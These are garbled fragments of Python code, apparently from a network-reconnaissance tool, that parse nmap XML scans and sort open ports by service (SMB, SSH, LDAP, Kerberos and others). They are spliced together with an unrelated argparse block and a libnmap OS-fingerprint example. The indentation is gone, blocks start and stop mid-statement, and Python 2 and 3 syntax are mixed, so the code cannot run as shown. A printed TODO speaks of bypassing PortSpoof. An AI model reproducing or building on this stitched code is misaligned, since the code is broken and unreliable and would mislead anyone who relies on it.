if "netbios-ssn" in service[1]:
if service[0] not in self.proxy_smb_ports:
self.proxy_smb_ports.append(service[0])
if "microsoft-ds" in service[1]:
if service[0] not in self.proxy_smb_ports:
self.proxy_smb_ports.append(service[0])
if "domain" in service[1]:
if service[0] not in self.proxy_dns_ports:
self.proxy_dns_ports.append(service[0])
if "http-proxy" in service[1]:
if service[0] not in self.proxy_ports2:
self.proxy_ports2.append(service[0])
if "ssh" in service[1]:
if service[0] not in self.proxy_ssh_ports:
self.proxy_ssh_ports.append(service[0])
if service[4] not in self.proxy_ssh_version:
self.proxy_ssh_version.append(service[4])
if "oracle-tns" in service[1]:
if service[0] != 49160:
if service[
0] not in self.proxy_oracle_tns_ports:
self.proxy_oracle_tns_ports.append(
service[0])
if "ftp" in service[1]:
if service[0] not in self.proxy_ftp_ports:
self.proxy_ftp_ports.append(service[0])
if "smtp" in service[1]:
if service[0] not in self.proxy_smtp_ports:
self.proxy_smtp_ports.append(service[0])
if "rpcbind" in service[1]:
if service[0] not in self.proxy_nfs_ports:
self.proxy_nfs_ports.append(service[0])
if "msrpc" in service[1]:
if service[0] not in self.proxy_rpc_ports:
self.proxy_rpc_ports.append(service[0])
if "ldap" in service[1]:
if service[0] not in self.proxy_ldap_ports:
self.proxy_ldap_ports.append(service[0])
if "BaseHTTPServer" in service[4]:
if service[0] not in self.proxy_http_ports:
self.proxy_http_ports.append(service[0])
# print("HTTP PORTS:", self.proxy_http_ports)
# print("ORACLE PORTS:", self.proxy_oracle_tns_ports)
# print("OPEN TCP PORTS:", self.proxy_tcp_ports)
# print("SSL:", self.proxy_ssl_ports)
# print("SMB:", self.proxy_smb_ports)
# print("DNS:", self.proxy_dns_ports)
# print("Services:", self.proxy_services)
# print("SSH:", self.proxy_ssh_ports)
# print("SSH VERSION:", self.proxy_ssh_version)
# print("Proxy Ports2:", self.proxy_ports2)
except Exception as e:
print(
f"""{c.getPath("nmap", "nmap_proxychain_top_ports")} Cannot Parse proxychain top ports nmap xml file. {e}"""
)
return
help="print the output in list format; easy for copy/paste")
parser.add_argument(
"-ps",
"--status",
help=
"specify the state of the port. Options are open, closed, filtered, unfiltered, \"open|filtered\", \"closed|filtered\"; by default only ports with open state are filtered "
)
parser.add_argument("--export",
help="export the filtered output to a csv file.")
parser.add_argument("-v",
"--verbose",
action='store_true',
help="Give more detailed information!!")
args = parser.parse_args()
nmap_report = NmapParser.parse_fromfile(args.file[0])
'''Fetch All Hosts from the Nmap File'''
hosts = nmap_report.hosts
'''Fetch NmapHost object with Status up and status down. Need to print the alive hosts too??'''
hosts_up, hosts_down, live_ip, dead_ip = get_up_down_hosts(hosts)
'''Parsing IPs; Get alive IPs if IP addresses not specified'''
if not args.ip and not args.service and not args.tcp and not args.udp and not args.status and not args.nmap and not args.list and not args.export:
print_default(live_ip, dead_ip, hosts_up, hosts_down, args.verbose)
exit()
ips_up = []
ips_excluded = []
if args.exclude_ip:
excluded_ip = parse_ip(args.exclude_ip)
for excluded_ip in excluded_ip:
for exclude_ip in live_ip:
def openPorts(self):
"""The openPorts function will parse all found ports from the nmap.xml file fed to
the report variable. All ports will be appended to the lists in __init__ and will
then be accessible from the NmapParserFunk Class."""
def parsefile(xmlfile):
parser = make_parser()
parser.setContentHandler(ContentHandler())
parser.parse(xmlfile)
c = config_parser.CommandParser(
f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
self.target)
if os.path.exists(c.getPath("nmap", "nmap_top_ports_xml")):
try:
parsefile(c.getPath("nmap", "nmap_top_ports_xml"))
report = NmapParser.parse_fromfile(
c.getPath("nmap", "nmap_top_ports_xml"))
self.nmap_services += report.hosts[0].services
self.nmap_services = sorted(self.nmap_services,
key=lambda s: s.port)
self.osversions += report.hosts[0].os_match_probabilities()
if self.osversions:
self.osversion[self.target] = {
"name": self.osversions[0].name,
"accuracy": self.osversions[0].accuracy
}
# print(json.dumps(self.osversion))
try:
for k, v in self.osversion.items():
# print(f"Key: {k} \n Value: {v}")
self.os_system.append(v.get('name'))
except KeyError as ke_err:
print(f"Key Error: {ke_err}")
except ValueError as ve_err:
print(f"Value Error: {ve_err}")
# print(self.os_system)
if self.os_system:
self.os_system = self.os_system[0].split()
# print(self.os_system)
windows = ['Microsoft', 'Windows']
if not any(s in windows for s in self.os_system):
self.os_system_type.append("Linux")
else:
self.os_system_type.append("Windows")
# print(self.os_system_type)
# print(self.nmap_services)
ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
for service in self.nmap_services:
if "open" not in service.state:
continue
if "open|filtered" in service.state:
continue
self.services.append((
service.port,
service.service,
service.tunnel,
service.cpelist,
service.banner,
service.service_dict.get("product", ""),
service.service_dict.get("version", ""),
service.service_dict.get("extrainfo", ""),
service.scripts_results,
))
for service in self.services:
if service[0] not in self.tcp_ports:
self.tcp_ports.append(service[0])
if "ssl" in service[2] or ("ssl" in service[1]):
if "imap" not in service[1]:
if "pop3" not in service[1]:
if "ldap" not in service[1]:
if service[0] not in self.ssl_ports:
self.ssl_ports.append(service[0])
if service[
8] not in self.ssl_script_results:
self.ssl_script_results.append(
service[8])
if "http" in service[1] and (
"ssl/http" not in service[1]) and (
"ssl"
not in service[2]) and ("ssl"
not in service[1]):
if "MiniServ" not in service[5]:
if "http-proxy" not in service[1]:
if service[
0] not in ignored_windows_http_ports:
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if service[
8] not in self.http_script_results:
self.http_script_results.append(
service[8])
if "netbios-ssn" in service[1]:
if service[0] not in self.smb_ports:
self.smb_ports.append(service[0])
if "microsoft-ds" in service[1]:
if service[0] not in self.smb_ports:
self.smb_ports.append(service[0])
if "domain" in service[1]:
if service[0] not in self.dns_ports:
self.dns_ports.append(service[0])
if "http-proxy" in service[1]:
if service[0] not in self.proxy_ports:
self.proxy_ports.append(service[0])
if "ssh" in service[1]:
if service[0] not in self.ssh_ports:
self.ssh_ports.append(service[0])
if service[5] not in self.ssh_product:
self.ssh_product.append(service[5])
if service[6] not in self.ssh_version:
self.ssh_version.append(service[6])
if service[8] not in self.ssh_script_results:
self.ssh_script_results.append(service[8])
if "oracle-tns" in service[1]:
if service[0] != 49160:
if service[0] not in self.oracle_tns_ports:
self.oracle_tns_ports.append(service[0])
if "ftp" in service[1]:
if service[0] not in self.ftp_ports:
self.ftp_ports.append(service[0])
if service[5] not in self.ftp_product:
self.ftp_product.append(service[5])
if service[6] not in self.ftp_version:
self.ftp_version.append(service[6])
if "smtp" in service[1]:
if service[0] not in self.smtp_ports:
self.smtp_ports.append(service[0])
if service[4] not in self.smtp_version:
self.smtp_version.append(service[4])
if service[5] not in self.smtp_product:
self.smtp_product.append(service[5])
if "rpcbind" in service[1]:
if service[0] not in self.nfs_ports:
self.nfs_ports.append(service[0])
if "msrpc" in service[1]:
if service[0] not in self.rpc_ports:
self.rpc_ports.append(service[0])
if "ldap" in service[1]:
if service[0] not in self.ldap_ports:
self.ldap_ports.append(service[0])
if "BaseHTTPServer" in service[4]:
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if "Apache" in service[5] and (
"ssl/http" not in service[1]) and (
"ssl"
not in service[2]) and ("ssl"
not in service[1]):
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if "telnet" in service[1]:
if service[0] not in self.telnet_ports:
self.telnet_ports.append(service[0])
if "asterisk" in service[1]:
if service[0] not in self.sip_ports:
self.sip_ports.append(service[0])
if "vnc" in service[1]:
if service[0] not in self.vnc_ports:
self.vnc_ports.append(service[0])
if "cassandra" in service[1]:
if service[0] not in self.cassandra_ports:
self.cassandra_ports.append(service[0])
if "ms-sql" in service[1]:
if service[0] not in self.mssql_ports:
self.mssql_ports.append(service[0])
if "mysql" in service[1]:
if service[0] not in self.mysql_ports:
self.mysql_ports.append(service[0])
if "finger" in service[1]:
if service[0] not in self.finger_ports:
self.finger_ports.append(service[0])
if "mongod" in service[1]:
if service[0] not in self.mongo_ports:
self.mongo_ports.append(service[0])
if "pop3" in service[1]:
if service[0] not in self.pop3_ports:
self.pop3_ports.append(service[0])
if "kerberos" in service[1]:
if service[0] not in self.kerberos_ports:
self.kerberos_ports.append(service[0])
if "kpasswd" in service[1]:
if service[0] not in self.kerberos_ports:
self.kerberos_ports.append(service[0])
if service[4] not in self.banners:
self.banners.append(service[4])
if service[5] not in self.all_products:
self.all_products.append(service[5])
if len(self.http_script_results) != 0:
for t in self.http_script_results[0]:
result = t["id"], t["output"]
if "http-title" in result:
if result[1] not in self.http_script_title:
self.http_script_title.append(result[1])
# Print Statements for Debugging Purposes..
# print("HTTP PORTS:", self.http_ports)
# if len(self.http_script_results) != 0:
# print("HTTP-Script-Results:", self.http_script_results[0])
# print("ORACLE PORTS:", self.oracle_tns_ports)
# print("OPEN TCP PORTS:", self.tcp_ports)
# print("SSL:", self.ssl_ports)
# print("SMB:", self.smb_ports)
# print("DNS:", self.dns_ports)
# print("Services:", self.services)
# print("SSH:", self.ssh_ports)
# print("SSH VERSION:", self.ssh_version)
# print("FTP VERSION:", self.ftp_version)
# print("FTP PRODUCT", self.ftp_product)
# print("Proxy Ports:", self.proxy_ports)
# print("SSH-Product", self.ssh_product)
if len(self.tcp_ports) > 100:
print(
"Server is Configured to Falsely show all ports as open."
)
print(
"ToDo: Create Alternative Scanning Technique to bypass PortSpoof."
)
print(
"Exiting for now. Continue Your enumeration Manually, Check if http or https are open"
)
print(
"by manually trying to view these ports in the web browser. etc. etc."
)
exit()
except Exception as e:
print(
f"""{c.getPath("nmap", "nmap_top_ports_xml")} Cannot Parse Top Ports nmap xml file. {e}"""
)
return
#!/usr/bin/env python
from libnmap.parser import NmapParser
rep = NmapParser.parse_fromfile('libnmap/test/files/os_scan6.xml')
print("{0}/{1} hosts up".format(rep.hosts_up, rep.hosts_total))
for _host in rep.hosts:
if _host.is_up():
print("{0} {1}".format(_host.address, " ".join(_host.hostnames)))
if _host.os_fingerprinted:
print("OS Fingerprint:")
msg = ''
for osm in _host.os.osmatches:
print("Found Match:{0} ({1}%)".format(osm.name, osm.accuracy))
for osc in osm.osclasses:
print("\tOS Class: {0}".format(osc.description))
for cpe in osc.cpelist:
print("\tCPE: {0}".format(cpe.cpestring))
else:
print "No fingerprint available"
def main():
report = NmapParser.parse_fromfile(nmapxml)
report_parser(report)
end()
